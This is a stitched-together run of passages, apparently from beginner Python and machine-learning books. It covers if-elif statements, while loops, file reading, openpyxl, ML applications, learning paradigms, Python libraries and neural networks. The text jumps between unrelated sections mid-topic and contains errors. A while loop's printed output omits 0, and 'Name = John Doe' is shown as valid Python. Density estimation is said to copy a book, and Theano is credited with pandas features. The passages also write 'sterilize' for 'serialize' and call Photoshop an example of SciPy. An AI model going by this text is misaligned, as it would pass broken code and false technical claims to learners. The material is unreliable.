for those values, you can put them in an if-elif-else block. This
way, on the first true, no other condition gets executed. Or, elif gets
executed, or the else clause.
We did just the same. We said, If the lights and stove are on, you
just close the stove. Else if (elif in Python), the lights are closed
but the stove is on, turn the lights, close the stove. And further,
continue with the else statement.
The example also shows how you can run multiple conditions in an
if-elif-else statement and base the output on all those.
Loops – The Never-Ending Cycle
Imagine you are creating a program which asks the user to guess a
number. The code should ideally run for three times before it could
let the user know that they consumed their three chances and failed.
Similarly, the program should be smart enough to know if the user
guessed the right number, in which case, it would end the execution
of the program by displaying “You guessed the right number!”
We use loops to address such situations. Loops are when an entire
block of code continues to run over and over again, until the
condition set is no longer valid. If you forget to set a condition, or
if a condition is not properly defined, you may start an endless loop
that will never cease, causing the program to crash completely.
Do not worry, your system will not crash. You can end the program
by using the red/pink stop button that always magically appears
after you hit the green run button.
There are essentially two types of loops we use in Python. The first
one is the ‘while’ loop, and the second one is the ‘for’ loop.
The ‘While’ Loop
This type of loop runs a specific block of code for as long as the
given condition remains true. Once the given condition is no longer
valid, or turns to false, the block of code will end right away.
This is quite a useful feature as there may be codes which you may
need to rely on to process information quickly. To give you an
idea, suppose, you are to guess a number. You have three tries.
You want the prompt to ask the user to guess the number. Once the
user guesses the wrong number, it will reduce the maximum
number of tries from three to two, inform the user that the number
is wrong and then ask to guess another time. This will continue
until either the user guesses the right number or the set number of
guesses are utilized and the user fails to identify the number.
Imagine just how many times you would have to write the code
over and over again. Now, thanks to Python, we just type it once
underneath the ‘while’ loop and the rest is done for us.
Here’s how the syntax for the ‘while’ loop looks like:
while condition:
code
code
…
You begin by typing in the word ‘while’ followed by the condition.
We then add a colon, just like we did for the ‘if’ statement. This
means, whatever will follow next, it will be indented to show that
the same is working underneath the loop or the statement.
Let us create a simple example from this. We start by creating a
variable. Let’s give this variable a name and a value like so:
x=0
Nothing fun here, so let us add something to make it more exciting.
Now, we will create a condition for a while loop. The condition
would state that as long as x is equal to or less than 10, the prompt
will continue to print the value of x. Here’s how you would do that:
x=0
while x <= 10:
print(x)
Now try and run that to see what happens!
Your console is now bombarded with a never-ending loop of zeros.
Why did that happen? If you look close enough at the code, we
only assigned one value to our variable. There is no code to change
the value or increase it by one or two, or any of that.
In order for us to create a variable that continues to change variable
after it has printed the initial value, we need to add one more line to
the code. Call it as the increment code, where x will increase by
one after printing out a value. The loop will then restart, this time
with a higher value, print that and then add one more. The loop will
continue until x is equal to 10. The second it hits the value of 11,
the interpreter will know that the condition no longer remains true
or valid, and hence we will jump out of the loop.
x=0
while x <= 10:
print(x)
x=x+1
The last line will execute and recall the current value of x, and then
it will add one to the value. The result would look like this.
1
2
3
4
5
6
7
8
9
10
If you do not like things to add just like that, add a little print
statement to say “The End” and that should do the trick.
I almost forgot! If you intend to add a print statement at the end,
make sure you hit the backspace key to delete the indentation first.
Let’s make things a little more fun now, and to do that, we will be
creating our very first basic game.
Let me paint the scenario first. If you like, pick up a pen and a
paper, or just open notepad on your computer. Try and write down
what you think is the possible solution for this.
The game has a secret number that the end-user cannot see. Let’s
assume that the number is set to 19. We will allow the user to have
three attempts to guess the number correctly. The game completes
in a few possible ways:
There we could see that inside the read() there is a number 9, which
will tell Python that he has to read only the first nine letters of the
file
Readline(n) Method
The readline method is the one that reads a line from the file, so
that the read bytes can be returned in the form of a string. The
readline method is not able to read more than one line of code,
even if the byte n exceeds the line quantity.
Its syntax is very similar to the syntax of the read() method.
Readlines(n) Method
The readlines method is the one that reads all the lines of the file,
so that the read bytes can be taken up again in the form of a string.
Unlike the readline method, this one is able to read all the lines.
Like the read() method and readline() its syntax are very similar:
What's a buffer?
We can define the buffer as a file which is given a temporary use in
the ram memory; this will contain a fragment of data that composes
the sequence of files in our operating system. We use buffers very
often when we work with a file which we do not know the storage
size.
It is important to keep in mind that, if the size of the file were to
exceed the ram memory that our equipment has, its processing unit
will not be able to execute the program and work correctly.
What is the size of a buffer for? The size of a buffer is the one that
will indicate the available storage space while we use the file.
Through the function: io.DEFAULT_BUFFER_SIZE the program
will show us the size of our file in the platform in a predetermined
way.
We can observe this in a clearer way:
Errors
In our files, we are going to find a string (of the optional type)
which is going to specify the way in which we could handle the
coding errors in our program.
Errors can only be used in txt mode files.
These are the following:
Ignore_errors() This will avoid the comments
with a wrong or unknown
format
Strict_errors() This is going to generate a
subclass or UnicodeError in
case that any mistake or fail
comes out in our code file
Encoding
The string encoding is frequently used when we work with data
storage and this is nothing more than the representation of the
encoding of characters, whose system is based on bits and bytes as
a representation of the same character.
This is expressed as follows:
Newline
The Newline mode is the one that is going to control the
functionalities of the new lines, which can be '\r', " ", none, '\n', and
'\r\n'.
The newlines are universal and can be seen as a way of interpreting
the text sequences of our code.
1.The end-of-line sentence in Windows: "\r\n".
2.The end-of-line sentence in Max Os: "\r".
3.The end-of-line sentence in UNIX: "\n"
On input: If the newline is of the None type, the universal newline
mode is automatically activated.
Input lines can end in "\r", "\n" or "\r\n" and are automatically
translated to "\n" before being returned by our program. If their
respective legal parameters when coding are met, the entry of the
lines will end only by the same given string and their final line will
not be translated at the time of return.
On output: If the newline is of the None type, any type of character
"\n" that has been written, will be translated to a line separator
which we call "os.linesep".
If the newline is of the type " " no type of translator is going to be
made, and in case the newline meets any value of which are
considered the legal for the code, they will be automatically
translated to the string.
Example of newline reading for " ".
Xlsx files: xlsx files are those files in which you work with
spreadsheets, how is this? Well, this is nothing more than working
with programs like Excel. For example, if we have the windows
operating system on our computer, we have the advantage that
when working with this type of files, the weight of it will be much
lighter than other types of files.
The xlsx type files are very useful when working with databases,
statistics, calculations, numerical type data, graphics and even
certain types of basic automation.
In this chapter we are going to learn to work the basic
functionalities of this type of files, this includes creating files,
opening files and modifying files.
To start this, first we will have to install the necessary library; we
do this by executing the command "pip3 install openpyxl" in our
Python terminal.
Once executed this command it is going to download and install the
openpyxl module in our Python files, we can also look for
documentation to get the necessary information about this module.
Create an xlsx file: To create a file with this module, let's use the
openpyxl() Workbook() function.
This is the first step that we will do to manage the files of the type
xlsx, we can see that first we have created the file importing the
function Workbook of the module openpyxl; followed by this to
the variable wb we have assigned the function Workbook() with
this we declare that this will be the document with which we are
going to work (we create the object in the form of a worksheet in
this format). Once this is done, we activate the object whose name
is wb in order to assign it a name and finally save the file.
Add information to the file with this module: In order to add
information to our file, we will need to use another type of
functions that come included with the object, one of them is the
append function.
JOHN S. CODE
1. Ensemble modeling
2. Scalability
3. Iterative and automation processes
4. Algorithms, a good combination of basic and advanced ones
5. Data preparation capabilities.
The neat thing about working with machine learning is that almost every
industry is able to use it. And it is still relatively new when it comes to the
world of technology, so even the amazing things that have been done with it
so far is just the beginning, and it is believed that this kind of technology is
going to be able to do even more things in the process.
Machine learning is likely to grow quite a bit as time goes on. Right now, a
lot of companies are using it in order to figure out what the data they are
receiving is telling them, to figure out how they are able to make better
business decisions over time, rather than having to make the decisions on
their own, and to find some of the patterns that are hidden in the data, and
that a human would not be able to go through.
But this is just the start of what we are able to do when it comes to machine
learning. There are a ton of other applications, and what we are able to do
with this right now is just the beginning. As more people and developers start
to work with machine learning and start to add in some of the Python
languages with it, it is likely that more and more applications are going to be
available as well.
Most of the industries that are out there that re already working with large
amounts of data are going to be able to recognize the kind of value that they
would get with using the technology that comes with machine learning. By
being able to actually get through this data and glean some good insights
from it, and being able to do this close to real-time, the company is then able
to work in a more efficient manner in order to gain a big advantage of others
in their same industry.
And this is the beauty of working with machine learning. We are able to do
things that may have seemed impossible in the past are possible now with the
help of machine learning. Businesses that are handling more data than ever
before are finding the value of working with machine learning to help them
get their work done. They can get through this information faster than would
be possible with a person looking through it on their own and can give them
that competitive edge over others.
There are a lot of different companies that will be able to benefit from a
program that can run on machine learning. Some of the different industries
that are already using this kind of technology will include financial services,
government, health care, retail, oil and gas, transportation, and more.
Machine learning is similar to artificial intelligence that is going to allow a
computer to learn, similar to what we are seeing with the human mind as
well. With a minimal amount of supervision from a person, the machine will
be able to automate a lot of tasks, find the information that you want, and get
to some insights and predictions that you may not be able to find in other
methods on your own. And this guidebook is going to spend some time
looking at how you are able to do this type of machine learning with the help
of the Python coding language so you can start some of your own projects in
no time.
Chapter 2 Applications of Machine Learning
Machine learning helps to change how businesses work and operate in
today’s world. Through machine learning, large volumes of data can be
extracted, which makes it easier for the user to draw some predictions from a
data set.
There are numerous manual tasks that one cannot complete within a
stipulated time frame if the task includes the analysis of large volumes of
data. Machine learning is the solution to such issues. In the modern world, we
are overwrought with large volumes of data and information, and there is no
way a human being can process that information. Therefore, there is a need to
automate such processes, and machine learning helps with that.
When any analysis or discovery is automated fully, it will become easier to
obtain the necessary information from that analysis. This will also help the
engineer automate any future processes. The world of business analytics, data
science, and big data requires machine learning and deep learning. Business
intelligence and predictive learning are no longer restricted to just large
businesses but are accessible to small companies and businesses too. This
allows a small business to utilize the information that it has collected
effectively. This section covers some of the applications of machine learning
in the real world.
Virtual Personal Assistants
Some examples of virtual assistants are Allo, Google Now, Siri and Alexa.
These tools help users access necessary information through voice
commands. All you must do is activate the assistant, and you can ask the
machine any questions you want.
Your personal assistant will look for the necessary information based on your
question, and then provide you with an answer. You can also use this
assistant to perform regular tasks like setting reminders or alarms. Machine
learning is an important part of this tool since it helps the system gather the
necessary information to provide you with an answer.
Density Estimation
Machine learning will help a system use any data that is available on the
Internet, and it can use that data to predict or suggest some information to
users. For example, if you want to purchase a copy of “A Song of Ice and
Fire” from a bookstore, and run it through a machine, you can generate a
similar copy of the book using that very machine.
Latent Variables
When you work with latent variables, the machine will try to identify if these
variables are related to other data points and variables within the data set.
This is a handy method when you use a data set where it is difficult to
identify the relationship between different variables. There are times when
you will be unable to identify why there is a change in a variable. The
engineer can understand the data better if he or she can take a look at the
different latent variables within the data set.
Reduction of Dimensionality
The data set that is used to train machines to predict the outcome to any
problem will have some dimensions and variables. If there are over three
dimensions within the data set, it will become impossible for the human mind
to visualize or understand that data. In these situations, it is always good to
have a machine learning model to reduce the volume of the data into smaller
segments that are easily manageable. This will help the user identify the
relationships that exist within the data set.
Every machine learning model will ensure that the machine learns from the
data that is provided to it. The machine can then be used to classify data or
predict the outcome or the result for a specific problem. It can also be used in
numerous applications like self-driving cars. Machine learning models help
to improve the ability of smartphones to recognize the user’s face or the way
in which Google Home or Alexa can recognize your accent and voice and
how the accuracy of the machines improves if they have been learning for
longer.
Steps in Building a Machine Learning System
Regardless of the type of model that you are trying to build or the problem
that you are trying to solve, you will follow the steps mentioned in this
section while building a machine learning algorithm.
Define Objective
The first step, as it is with any other task that you perform, is to define the
purpose or the objective you want to accomplish using your system. This is
an important step since the data you will collect, the algorithm you use, and
many other factors depend on this objective.
Collect Data
Once you have your objective in mind, you should collect the required data.
It is a time-consuming process, but it is the next important step that you must
achieve. You should collect the relevant data and ensure that it is the right
data for the problem you are trying to solve.
Prepare Data
This is another important step, but engineers often overlook it. If you do
overlook this step, you will be making a mistake. It is only when the input
data is clean and relevant that you will obtain an accurate result or prediction.
Select Algorithm
Numerous algorithms can be used to solve a problem, including Structured
Vector Machine (SVM), k-nearest, Naive-Bayes and Apriori, etc. You must
choose the algorithm that best suits the objective.
Train Model
When your data set is ready, you should feed it into the system and help the
machine learn using the chosen algorithm.
Test Model
When your model is trained, and you believe that it has provided the relevant
results, you can test the accuracy of the model using a test data set.
Predict
The model will perform numerous iterations with the training data set and the
test data set. You can look at the predictions and provide feedback to the
model to help it improve the predictions that it makes.
Deploy
Once you have tested the model and are happy with how it works, you can
sterilize that model and integrate it into any application that you want to use.
This means that the model that you have developed can now be deployed.
The steps followed will vary depending on the type of application and
algorithm that you are using. You can choose to use a supervised or
unsupervised machine learning algorithm. The steps mentioned in this section
are often the steps followed by most engineers when they are developing a
machine learning algorithm. There are numerous tools and functions that you
can use to build a machine learning model. This book will help you with
understanding more about how you can design a machine learning model
using Python.
Chapter 3 Big Data and Machine Learning
In order to learn something, a system that is capable of machine learning
needs to be exposed to a lot of data. Going back several decades, computers
didn’t have access to all that much data, in comparison to what they can
access today. Computers were slow and quite awkward. Most data at that
time was stored on paper, and so it was not readily accessed by computer
systems. There was also far less of it. Of course, companies and large
businesses, along with governments have always collected as much data as
they could, but when you don’t have that much data and it’s mostly in the
form of paper records, then you don’t have much data that is useful to a
machine learning computer system.
The first databases were invented in the late 1960s. A database is not really
what we think of when considering the relationship between data and
machine learning, although it could be in some circumstances. Databases
collect very organized information. To understand the difference, think about
a collection of Facebook posts, versus a record of someone registering to
enroll at a university. The collection of Facebook posts is going to be
disorganized and messy. It is going to have data of different types, such as
photos, videos, links, and text. It’s going to be pretty well unclassified,
maybe only marked by who posted it and the date.
In contrast, when you say database you should think completely organized
and restricted data. A database is composed of individual records, each record
containing the same data fields. At a university, students when enrolled might
enter their name, social security or ID number, address, and so on.
All of these records are stored in the same format, together in one big file.
The file can then be “queried” to return records that we ask for. For example,
we could have it return records for everyone in the Freshman class.
Relational databases allow you to cross reference information and bring it
together in a query. Following our example, you could have a separate
database that had the courses each student was taking. This could be stored in
a separate database from the basic information of each student, but it could be
cross referenced using a field as a student ID.
Tools were developed to help bring data together from different databases.
IBM, a company that always seems to figure large in many developments in
computer science, developed the first structured query language or SQL, that
could be used to do tasks like this. Once data could be pulled together, it
could be analyzed or used to do things like print out reports for human
operators.
As computers became more ubiquitous, companies and government agencies
began collecting more and more data. But it wasn’t until the late 1990s that
the amount of data and types of data began to explode. There were two
developments that led to these changes. The first was the invention of the
internet. The second was the development of ever improving and lower cost
computer storage capacity.
The development and commercialization of the internet meant that over a
very short time period, nearly everyone was getting “online”. Businesses
moved fast to get online with websites. Those that didn’t fall behind, and
many ended up going out of business. But that isn’t what’s important for our
purposes. The key here is that once people got online, they were leaving data
trails all over the place.
This kind of data collection was increasing in the offline world as well, as
computing power started to grow. For example, grocery stores started
offering supposed discount and membership cards, that really functioned to
track what people were buying, so that the companies could make customized
offers to customers, and so they could adjust their marketing plans and so
forth.
The internet also brought the concept of cloud computing to the forefront.
Rather than having a single computer, or a network of computers in one
office, the internet offered the possibility of harnessing the power of multiple
computers linked together both for information processing and doing
calculations and also for simple data storage.
A third development, the continual decline in the costs of storage components
of computer systems along with increased capacity had a large impact in this
area. Soon, more and more data was being collected. Large companies like
Google, and eventually Facebook, also started collecting large amounts of
data on people’s behavior.
This is where machine learning hits the road. For the first time, the amounts
of data that machine learning systems needed to be able to perform real world
tasks, not just do things like playing checkers, became possible. Machine
learning systems are trained on data sets, and now businesses (and
governments) had data of all kinds to train machine learning systems to do
many different tasks.
Goals and Applications of Machine Learning
Machine learning is something that can be applied whenever there is a useful
pattern in any large data set. In many cases, it is not known what patterns
exist before the data has been fed to a machine learning system. This is
because human beings are not able to see the underlying pattern in large data
sets, but computers are well suited to finding them. The types of patterns are
not limited in any way. For example, a machine learning system can be used
to detect hacking attempts on a computer network. It can be trained for
network security by feeding the system past data that includes previous
hacking attempts.
1. Supervised Learning
This paradigm happens to be the most popular, probably because it is easy to
comprehend and execute. Here, the algorithm creates a mathematical concept
from a labeled dataset, i.e a dataset containing both the input and output
parameters. This dataset acts as a trainer to the model. Taking an example, we
may decide to use the algorithm to determine whether a particular image
contains a certain object. In this case, the dataset would comprise images with
and without the input (that object), with every image having the output
designating whether or not it contains the particular object. The algorithm is
likely to predict any answer; whether right or wrong. However, after several
attempts it gets trained on picking only the images containing the said object.
Once it gets totally trained, the algorithm starts making right predictions even
when new data is input. A perfect example of a supervised learning model is
a support vector machine. On the diagram below, the support vector machine
divides data into sections separated by a linear boundary. You realize the
boundary separates the white circles from the black.
❖ Agglomerative
This is the technique where every data is in itself a group. The number of
clusters is reduced by the iterative mergers between the two closest groups.
An example is the hierarchical clustering.
❖ Overlapping
Under this technique, data is associated with a suitable association value.
Fuzzy sets are used in grouping data and each point could fit into two or more
groups with different membership degrees. Fuzzy C-Means is a suitable
example under this type.
❖ Probabilistic
This concept creates clusters using probability distribution. See the example
below given some keywords;
“Men’s pants”
“Ladies’ pants”
“Men’s wallets”
“Ladies’ wallets”
The given keywords could be grouped into two; “pants” and “wallets” or
“Men” and “Ladies”.
Association
The rules under association allow the user to institute associations in the
midst of data objects inside big databases. As the name suggests, the
technique seeks to discover unique relations between variables contained in
large databases. For instance, shoppers could be grouped based on their
search and purchase histories.
3. Reinforcement Learning
This is a neural network learning technique that trains machine learning
concepts how to make a progression of decisions. The agent is trained how to
attain their objective in an indecisive, potentially complex environment. In
this technique, an artificial intelligence engages into a game-like situation and
the computer tries to solve the problem using trial and error method. For the
programmer to get the machine to do what they want, the artificial
intelligence gets penalized or rewarded for the actions performed. The idea is
to fully exploit the total reward.
Usually there is a reward policy in form of game rules, but the designer does
not give any hints on how the model should solve the puzzle. The model
starts from completely random trials and advances to sophisticated
approaches and even superhuman skills. In the process, this technique
leverages the full power of search, hence qualifying to be the most effectual
in hinting machine’s creativity. As opposed to humans, artificial intelligence
can employ a reinforcement algorithm to collect experience from thousands
parallel gameplays as long as it is run on an adequately powerful computer
infrastructure.
Let us look at a practical example that will perfectly illustrate the
reinforcement learning technique. However, before then we need to
understand some terms that we will use in the illustration.
Agent: This is an implicit entity that seeks to gain a reward by
performing actions in an environment.
Environment (e): A situation that an agent must face.
Reward (R): An instant response given to an agent on performing a
specific action.
State (s): The current scenario returned by the environment.
Policy (π): An approach employed by the agent to determine their next
action based on the prevailing state.
Value (V): The projected long-term return, which is discounted
comparing with the short-lived reward.
Value Function: This one stipulates the total reward, i.e, the value of
a state.
Model based methods: Handles the reinforcement learning-based
problems that apply model-based techniques.
Model of the environment: It imitates the behavior of the
environment, helping you draw conclusions regarding environment
behavior.
Action value / Q value (Q): This is not very different from value. In
fact, the only variation is that this one takes an extra parameter as a
current action.
Illustration
Think of trying to teach your dog some new tricks. This dog does not
understand human language so you need to devise a strategy that will help
you achieve your goal. You will initiate a situation and observe the various
reactions by your dog. If the dog responds in the desired way, you give him
some beef. You will realize that every time you expose the dog to a similar
condition, they will tend to respond with greater enthusiasm hoping to get a
reward (the beef). It means that the positive experiences inspire the responses
your dog gives. As well, there are the negative experiences that teach the dog
what not to do because should they do it, then they will certainly miss their
share of beef.
In the given paradigm, your dog is an agent exposed to the environment. You
may decide to have your situation as requiring your sitting dog to walk when
you utter a particular word. This agent responds by performing an action
where they transition from one state to another, like transitioning from sitting
to walking. In this case, the policy is a process of choosing an action given a
state with the expectation of better results. After transitioning, the agent may
get a penalty or a reward in response.
Reinforcement Learning Algorithms
There are three techniques in implementation of a reinforcement learning
algorithm.
Value-based: here, the agent is anticipating a long-term return of the
prevailing states under policy and so you ought to maximize the value
function.
Policy-based: under this RL scheme you endeavor to find a policy
such that the action executed in each state leads to maximal reward in
the future.
Policy-based method is further classified into deterministic, where the policy
produces the same action for any state, and stochastic, where every action has
a definite probability determined by the stochastic policy. The stochastic
policy is n{a\s) = P\A, = a\S, =S]
Model-based: in this case you are expected to generate a virtual model
for every environment, where the agent learns how to perform in that
very environment.
We have spent some time talking about the Python coding language and
some of the neat things that you can do with this. However, to complete this
book, we also need to get a good understanding of the Python language and
what it is all about. Different parts show up in the Python coding language,
but knowing some of the basics, as well as, learning some of the power that
comes with Python makes all of the difference on the success that you can get
when you combine this coding language with machine learning.
We have talked briefly about the Python coding language already, as well as
some of the reasons why it may be so beneficial when you want to work with
machine learning. Even though it is considered one of the easier coding
languages to learn how to work with, it has a lot of power and strength that
comes in behind it, which makes it the best option to use whether you are a
beginner or someone who has been coding for quite some time. And since the
Python language does have some of the power of the bigger and more
powerful coding languages, you will be able to do a lot of cool things with
machine learning.
There are going to be a few different parts that come into play when you start
to learn how to work with the Python code even with machine learning. You
can work with the comments, functions, statements, and more. Let’s take a
look at some of the basic parts that come with coding in Python so that we
can do some of these more complicated things together as we progress
through machine learning.
The Comments
The first aspect of the Python coding language that we need to explore is that
of comments. There is going to be some point when you are writing out a
code where you would like to take a break and explain to others and yourself
what took place in the code. This is going to ensure that anyone who sees the
code knows what is going on at one point to another. Working with a
comment is the way that you would showcase this in your project, and can
make it easier for others to know the name of that part, or why you are doing
one thing compared to another.
When you would like to add in some comments to the code, you are going to
have a unique character that goes in front of your chosen words. This unique
code is going to be there to help you tell the computer program that it should
skip reading those words and move on to the next part of the code instead.
The unique character that you are going to use for this one is the # sign in
front of the comments you are writing. When the compiler sees this, it is
going to know that you don’t want that part of the code to execute at all. It
will wait until the next line before it gets started with rereading the code. An
example of a comment that you may see in your code would include:
#this is a new comment. Please do not execute in the code.
After you have written out the comment that you want here, and you are done
with it, you are then able to hit the return button or enter so that you can write
more code that the compiler can execute. You can have the freedom to
comment as long or as short as you would like based on what you would need
in the code. And you can write in as many of these comments as you would
like. It is usually seen as a better option if you keep the comments down to
what you need. Otherwise, it makes the code start to look a little bit messy
overall. But you can technically add in as many of these comments to your
code as you would like.
The Statements
The next part of the code that we need to focus on is the statements. Any time
that you are starting with your new code, whether you are working with
Python or with some other coding language along the way, you must add
these statements inside of the code. This allows the compiler to know what
you would like to happen inside. A statement is going to be a unit of code
that you would like to send to your interpreter. From there, the interpreter is
going to look over the statement and execute it based on the command that
you added in.
Any time you decide to write out the code, you can choose how many
statements are needed to get the code to work for you. Sometimes, you need
to work with one statement in a block of code, and other times, you will want
to have more than one. As long as you can remember that the statements
should be kept in the brackets of your code, it is fine to make the statement as
long as you would like, and include as many statements as you would like.
When you are ready to write your code and add in at least one statement to
your code, you would then need to send it over so that the interpreter can
handle it all. As long as the interpreter can understand the statements that you
are trying to write out, it is going to execute your command. The results of
that statement are going to show up on the screen. If you notice that you write
out your code and something doesn’t seem to show up in it the right way,
then you need to go back through the code and check whether they are
written the right way or not.
Now, this all may sound like a lot of information, but there is a way to
minimize the confusion and ensure that it can make more sense to you. Let’s
take a look at some examples of how this is all going to work for you.
x = 56
Name = John Doe
z = 10
print(x)
print(Name)
print(z)
When you send this over to the interpreter, the results that should show up on
the screen are:
56
John Doe
10
It is as simple as that. Open up Python, and give it a try to see how easy it is
to get a few things to show up in your interpreter.
The Variables
The next things we consider inside our Python codes are the variables. These
variables are important to learn about because they are the part that will store
your code in the right places so you can pull them up later on. This means
that if you do this process in the right way, the variables are going to be
found inside the right spot of the memory in the computer. The data in the
code will help determine which spots of the memory these points will be
stored on, but this makes it easier for you to find the information when it is
time to run the code.
The first thing that we need to focus on here is to make sure that the variable
has a value assigned to it. If there is a variable without a value, then the
variable won’t have anything to save and store. If the variable is given a good
value from the start, then it will behave the way you are expecting when you
execute the program.
When it comes to your Python code, there are going to be three types of
variables that you can choose from. They are all important and will have their
place to work. But you have to choose the right one based on the value that
you would like to attach to that variable. The main variables that are available
for you with Python are going to include:
k-means
decision trees
linear and logistic regression
clustering
This kind of library has major components from NumPy and SciPy. Scikit
learn has the power to add algorithms sets that are useful in Machine
Learning and also tasks related to data mining. That's, it helps in
classification, clustering, and even regression analysis. There are also other
tasks that this library can efficiently deliver. A good example includes
ensemble methods, feature selection, and more so, data transformation. It is
good to understand that the pioneers or experts can easily apply this if at all,
they can be able to implement the complex and sophisticated parts of the
algorithms.
TensorFlow
It is a form of algorithm which involves deep learning. They are not always
necessary, but one good thing about them is their ability to give out correct
results when done right. It will also enable you to run your data in a CPU or
GPU. That's, you can write data in the Python program, compile it then run it
on your central processing unit. Therefore, this gives you an easy time in
performing your analysis. Again, there is no need for having these pieces of
information written at C++ or instead of other levels such as CUDA.
TensorFlow uses nodes, especially the multi-layered ones. The nodes perform
several tasks within the system, which include employing networks such as
artificial neutral, training, and even set up a high volume of datasets. Several
search engines such as Google depend on this type of library. One main
application of this is the identification of objects. Again, it helps in different
Apps that deal with the recognition of voice.
Theano
Theano too forms a significant part of Python library. Its vital tasks here are
to help with anything related to numerical computation. We can also relate it
to NumPy. It plays other roles such as;
Splitting of data
Merging of two or more types of data
Data aggregation
Selecting or subsetting data
Data reshaping
Diagrammatic explanations
Series Dimensional
A7
B8
C9
D3
E6
F9
You can quickly delete some columns or even add some texts
found within the Dataframe
It will help you in data conversion
Pandas can reassure you of getting the misplaced or missing
data
It has a powerful ability, especially in the grouping of other
programs according to their functionality.
Matplotlib
This is another sophisticated and helpful data analysis technique that helps in
data visualization. Its main objective is to advise the industry where it stands
using the various inputs. You will realize that your production goals are
meaningless when you fail to share them with different stakeholders. To
perform this, Matplotlib comes in handy with the types of computation
analysis required. Therefore, it is the only Python library that every scientist,
especially the ones dealing with data prefers. This type of library has good
looks when it comes to graphics and images. More so, many prefer using it in
creating various graphs for data analysis. However, the technological world
has completely changed with new advanced libraries flooding the industry.
It is also flexible, and due to this, you are capable of making several graphs
that you may need. It only requires a few commands to perform this.
In this Python library, you can create various diverse graphs, charts of all
kinds, several histograms, and even scatterplots. You can also make non-
Cartesian charts too using the same principle.
Diagrammatic explanations
The above graph highlights the overall production of a company within three
years. It specifically demonstrates the usage of Matplotlib in data analysis.
By looking at the diagram, you will realize that the production was high as
compared to the other two years. Again, the company tends to perform in the
production of fruits since it was leading in both years 1 and 2 with a tie in
year 3. From the figure, you realize that your work of presentation,
representation and even analysis has been made easier as a result of using this
library. This Python library will eventually enable you to come up with good
graphics images, accurate data and much more. With the help of this Python
library, you will be able to note down the year your production was high,
thus, being in a position to maintain the high productivity season.
It is good to note that this library can export graphics and can change these
graphics into PDF, GIF, and so on. In summary, the following tasks can be
undertaken with much ease. They include:
Diagrammatic Illustrations
The above line graph clearly shows the performance of different machines
the company is using. Following the diagram above, you can eventually
deduce and make a conclusion on which machines the company can keep
using to get the maximum yield. On most occasions, this evaluation method
by the help of the Seaborn library will enable you to predict the exact abilities
of your different inputs. Again, this information can help for future reference
in the case of purchasing more machines. Seaborn library also has the power
to detect the performance of other variable inputs within the company. For
example, the number of workers within the company can be easily identified
with their corresponding working rate.
NumPy
This is a very widely used Python library. Its features enable it to perform
multidimensional array processing. Also, it helps in the matrix processing.
However, these are only possible with the help of an extensive collection of
mathematical functions. It is important to note that this Python library is
highly useful in solving the most significant computations within the
scientific sector. Again, NumPy is also applicable in areas such as linear
algebra, derivation of random number abilities used within industries and
more so Fourier transformation. NumPy is also used by other high-end
Python libraries such as TensorFlow for Tensors manipulation. In short,
NumPy is mainly for calculations and data storage. You can also export or
load data to Python since it has those features that enable it to perform these
functions. It is also good to note that this Python library is also known as
numerical Python.
SciPy
This is among the most popular library used in our industries today. It boasts
of comprising of different modules that are applicable in the optimization
sector of data analysis. It also plays a significant role in integration, linear
algebra, and other forms of mathematical statistics.
In many cases, it plays a vital role in image manipulation. Manipulation of
the image is a process that is widely applicable in day to day activities. Cases
of Photoshops and much more are examples of SciPy. Again, many
organizations prefer SciPy in their image manipulation, especially the
pictures used for presentation. For instance, wildlife society can come up
with the description of a cat and then manipulate it using different colors to
suit their project. Below is an example that can help you understand this more
straightforwardly. The picture has been manipulated:
The original input image was a cat that the wildlife society took. After
manipulation and resizing the image according to our preferences, we get a
tinted image of a cat.
Keras
This is also part and parcel of Python library, especially within Machine
Learning. It belongs to the group of networks with high level neural. It is
significant to note that Keras has the capability of working over other
libraries, especially TensorFlow and even Theano. Also, it can operate
nonstop without mechanical failure. In addition to this, it seems to work
better on both the GPU and CPU. For most beginners in Python
programming, Keras offers a secure pathway towards their ultimate
understanding. They will be in a position to design the network and even to
build it. Its ability to prototype faster and more quickly makes it the best
Python library among the learners.
PyTorch
This is another accessible but open source kind of Python library. As a result
of its name, it boasts of having extensive choices when it comes to tools. It is
also applicable in areas where we have computer vision. Computer vision and
visual display play an essential role in several types of research. Again, it aids
in the processing of Natural Language. More so, PyTorch can undertake
some technical tasks that are for developers. That's enormous calculations
and data analysis using computations. It can also help in graph creation which
mainly used for computational purposes. Since it is an open-source Python
library, it can work or perform tasks on other libraries such as Tensors. In
combination with Tensors GPU, its acceleration will increase.
Scrapy
Scrapy is another library used for creating crawling programs. That's spider
bots and much more. The spider bots frequently help in data retrieval
purposes and also applicable in the formation of URLs used on the web.
From the beginning, it was to assist in data scrapping. However, this has
undergone several evolutions and led to the expansions of its general
purpose. Therefore, the main task of the scrappy library in our present-day is
to act as crawlers for general use. The library led to the promotion of general
usage, application of universal codes, and so on.
Statsmodels
Statsmodels is a library with the aim of data exploration using several
methods of statistical computations and data assertions. It has many features
such as result statistics and even characteristic features. It can undertake this
role with the help of the various models such as linear regression, multiple
estimators, and analysis involving time series, and even using more linear
models. Also, other models, such as discrete choice are applicable here.
Benefits of Applying Python in Machine Learning
Programming
For machine learning algorithms, we must have a programming language that
is clear and easy to be understood by a large portion of data researchers and
scientists. A language with libraries that are useful for different types of work
and in matrix math in specific will be preferable. Moreover, it is of a very
good advantage to use a language with a large number of active developers.
These features make Python the best choice. The main advantages of Python
can be summarized in the following points:
Hidden Layer
This layer utilizes a structure of weighted links to process values. It
multiplies the values getting into the stratum by weights and then adds the
weighted inputs to obtain a single number. The weighting, in this case, refers
to a group of preset numbers that the program stores. The hidden layer
implements particular conversions to the input values in the system.
Output Layer
This layer obtains links from the input layer or the hidden layer and provides
an output that matches the prediction of the feedback variable. The selection
of suitable weights leads to the layer producing relevant manipulation of data.
In this layer, the active nodes merge and modify the data to generate the
output value.
Conclusively, the input layer includes input neurons that convey information
to the hidden layer. The hidden layer then passes the data on to the output
layer. Synapses in a neural network are the flexible framework or boundaries
that transform a neural system into a parameterized network. Hence, every
neuron in the neural network contains balanced inputs, activation functions,
and an output. The weighted data represent the synapses while the activation
function establishes the production in a particular entry.
Advantages and Disadvantages of Neural Networks
There are some advantages and disadvantages to using Artificial Neural
Networks. Understanding them can enable one to comprehend better the
operations and shortcomings involved in the neural networks.
Advantages of Artificial Neural Networks
The following are the advantages of Artificial Neural Networks, which help a
person to learn the benefits of using the neural systems.
a) Ability to Make Machine Learning – Artificial neural systems learn
circumstances and events, and decide by remarking on similar occurrences.
b) Ability to Work with Incomplete Knowledge – Proper training enables
